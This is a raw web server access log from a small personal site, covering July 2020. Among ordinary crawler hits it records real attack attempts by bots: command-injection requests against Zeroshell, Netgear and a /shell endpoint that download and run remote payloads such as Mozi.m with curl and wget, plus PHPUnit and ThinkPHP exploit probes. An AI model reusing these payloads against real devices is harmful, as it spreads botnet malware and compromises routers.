Sun Jul 19 06:25:18 MDT 2020 06:25:18 up 8 days, 8:16, 1 user, load average: 0.49, 1.07, 1.58 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 10Jul20 8days 17:53 2.50s /usr/bin/lxsession -s LXDE-pi -e LXDE 80.82.70.140 - - [19/Jul/2020:12:32:35 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 102.177.205.158 - - [19/Jul/2020:13:05:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 66.249.73.171 - - [19/Jul/2020:13:24:56 +0000] "GET /ac0xl/www/2005-museumarchives/Charlotte/2005-06-11/100_1028s.jpg HTTP/1.1" 200 17464 "" "Googlebot-Image/1.0" 5.188.210.101 - - [19/Jul/2020:13:39:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:39:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:39:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:40:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:40:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:40:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [19/Jul/2020:13:42:19 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 45.76.157.210 - - [19/Jul/2020:15:43:06 +0000] "GET / HTTP/1.0" 200 25000 "" "" 45.148.10.97 - - [19/Jul/2020:15:43:35 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 163.172.66.130 - - [19/Jul/2020:15:51:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 211.75.69.242 - - [19/Jul/2020:16:37:37 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 211.75.69.242 - - [19/Jul/2020:16:37:43 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 211.75.69.242 - - [19/Jul/2020:16:40:33 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 106.75.52.88 - - [19/Jul/2020:16:41:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 106.75.52.88 - - [19/Jul/2020:16:41:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 106.75.52.88 - - [19/Jul/2020:16:41:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 106.75.52.88 - - [19/Jul/2020:16:41:53 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 106.75.52.88 - - [19/Jul/2020:16:41:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 106.75.52.88 - - [19/Jul/2020:16:41:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_171" 211.75.69.242 - - [19/Jul/2020:16:45:49 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 182.23.92.74 - - [19/Jul/2020:17:00:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 66.249.73.171 - - [19/Jul/2020:17:11:55 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.73.169 - - [19/Jul/2020:17:12:00 +0000] "GET /ac0xl/www/2005-museumarchives/James-Ramsay/Green-River-Articles/Green_River_Dispatch_1919/190828-9.gif HTTP/1.1" 200 1330404 "" "Googlebot-Image/1.0" 82.200.78.18 - - [19/Jul/2020:17:32:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 87.104.114.40 - - [19/Jul/2020:18:17:26 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://87.104.114.40:33810/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 84.241.15.182 - - [19/Jul/2020:18:36:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 218.161.122.88 - - [19/Jul/2020:18:54:20 +0000] "GET / HTTP/1.1" 400 0 "" "" 36.237.177.137 - - [19/Jul/2020:19:22:31 +0000] "GET / HTTP/1.1" 400 0 "" "" 103.54.217.81 - - [19/Jul/2020:19:22:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 66.249.73.171 - - [19/Jul/2020:20:23:36 +0000] "GET /ac0xl/www/2005-museumarchives/Charlotte/2005-05-22/100_0898.jpg HTTP/1.1" 304 0 "" "Googlebot-Image/1.0" 59.126.4.215 - - [19/Jul/2020:20:41:26 +0000] "GET / HTTP/1.1" 400 0 "" "" 45.148.10.97 - - [19/Jul/2020:21:15:22 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 183.136.225.56 - - [19/Jul/2020:22:37:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 185.137.218.227 - - [19/Jul/2020:22:43:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.99.159.17 - - [19/Jul/2020:23:04:32 +0000] "GET /ac0xl/illuminati/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 139.99.159.17 - - [19/Jul/2020:23:04:35 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 45.95.168.136 - - [19/Jul/2020:23:05:53 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 83.97.20.21 - - [19/Jul/2020:23:20:26 +0000] "GET / HTTP/1.0" 200 25000 "" "" 195.54.160.21 - - [19/Jul/2020:23:39:22 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:22 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:23 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:23 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:23 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:23 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [19/Jul/2020:23:39:24 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 103.149.192.235 - - [19/Jul/2020:23:46:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 200.69.87.4 - - [20/Jul/2020:00:07:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 220.135.154.169 - - [20/Jul/2020:00:34:18 +0000] "GET / HTTP/1.1" 400 0 "" "" 114.224.193.245 - - [20/Jul/2020:00:35:13 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 114.33.90.157 - - [20/Jul/2020:00:45:49 +0000] "GET / HTTP/1.1" 400 0 "" "" 59.127.69.13 - - [20/Jul/2020:00:46:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 120.133.140.242 - - [20/Jul/2020:00:46:46 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 120.133.140.242 - - [20/Jul/2020:00:46:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 114.35.23.40 - - [20/Jul/2020:00:57:16 +0000] "GET / HTTP/1.1" 400 0 "" "" 139.162.119.197 - - [20/Jul/2020:01:07:18 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 45.148.10.97 - - [20/Jul/2020:01:26:27 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 37.49.224.125 - - [20/Jul/2020:01:27:12 +0000] "GET / HTTP/1.1" 200 25000 "" "" 185.39.11.105 - - [20/Jul/2020:02:01:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Go-http-client/1.1" 66.249.73.171 - - [20/Jul/2020:02:23:01 +0000] "GET /ac0xl/www/2005-museumarchives/Raw-Data/0-Raw-Data/My-Pictures/2005-03%20%28Mar%29/waterwheel%201979.tif HTTP/1.1" 304 0 "" "Googlebot-Image/1.0" 104.152.52.32 - - [20/Jul/2020:02:49:59 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 34.234.79.75 - - [20/Jul/2020:03:27:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 114.32.60.72 - - [20/Jul/2020:03:45:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.243.128.209 - - [20/Jul/2020:04:24:42 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 45.148.10.97 - - [20/Jul/2020:04:49:28 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 27.77.31.104 - - [20/Jul/2020:05:16:22 +0000] "GET / HTTP/1.1" 400 0 "" "" 45.145.185.56 - - [20/Jul/2020:05:16:50 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 94.200.76.222 - - [20/Jul/2020:05:21:13 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 94.200.76.222 - - [20/Jul/2020:05:21:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.220.100.255 - - [20/Jul/2020:05:32:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36" 66.249.73.173 - - [20/Jul/2020:06:23:05 +0000] "GET /pictures/StMichaelTheArchangelMission/2020-02-25/SANY0983.JPG HTTP/1.1" 200 938646 "" "Googlebot-Image/1.0" 59.127.180.181 - - [20/Jul/2020:06:37:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 45.148.10.97 - - [20/Jul/2020:07:20:21 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 45.145.185.56 - - [20/Jul/2020:07:22:23 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 102.47.92.182 - - [20/Jul/2020:07:23:07 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1" 404 0 "" "Hello, world" 220.132.171.25 - - [20/Jul/2020:08:39:52 +0000] "GET / HTTP/1.1" 400 0 "" "" 202.62.58.99 - - [20/Jul/2020:09:25:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 92.63.194.47 - - [20/Jul/2020:09:27:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 123.174.96.115 - - [20/Jul/2020:09:37:41 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 45.95.168.113 - - [20/Jul/2020:09:48:41 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 61.219.11.153 - - [20/Jul/2020:10:09:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 88.250.236.251 - - [20/Jul/2020:10:13:08 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 66.249.73.173 - - [20/Jul/2020:10:23:01 +0000] "GET /ac0xl/www/2003-ArchHunterBooks/images/1041s.jpg HTTP/1.1" 404 0 "" "Googlebot-Image/1.0" 88.250.236.251 - - [20/Jul/2020:10:34:28 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 162.250.19.7 - - [20/Jul/2020:10:27:29 +0000] "GET /ac0xl/logs/2020.06.10 HTTP/1.1" 304 0 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [20/Jul/2020:10:27:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" computer hung! 66.249.79.203 - - [21/Jul/2020:06:24:35 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.201 - - [21/Jul/2020:06:24:39 +0000] "GET /pictures/StMichaelTheArchangelMission/2020-02-25/SANY1000.JPG HTTP/1.1" 200 830738 "" "Googlebot-Image/1.0" 121.233.40.20 - - [21/Jul/2020:06:43:03 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://121.233.40.20:42342/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 162.250.19.7 - - [21/Jul/2020:07:05:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [21/Jul/2020:07:05:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [21/Jul/2020:07:05:43 +0000] "GET /ac0xl/logs/2020.07.08 HTTP/1.1" 200 182236 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0"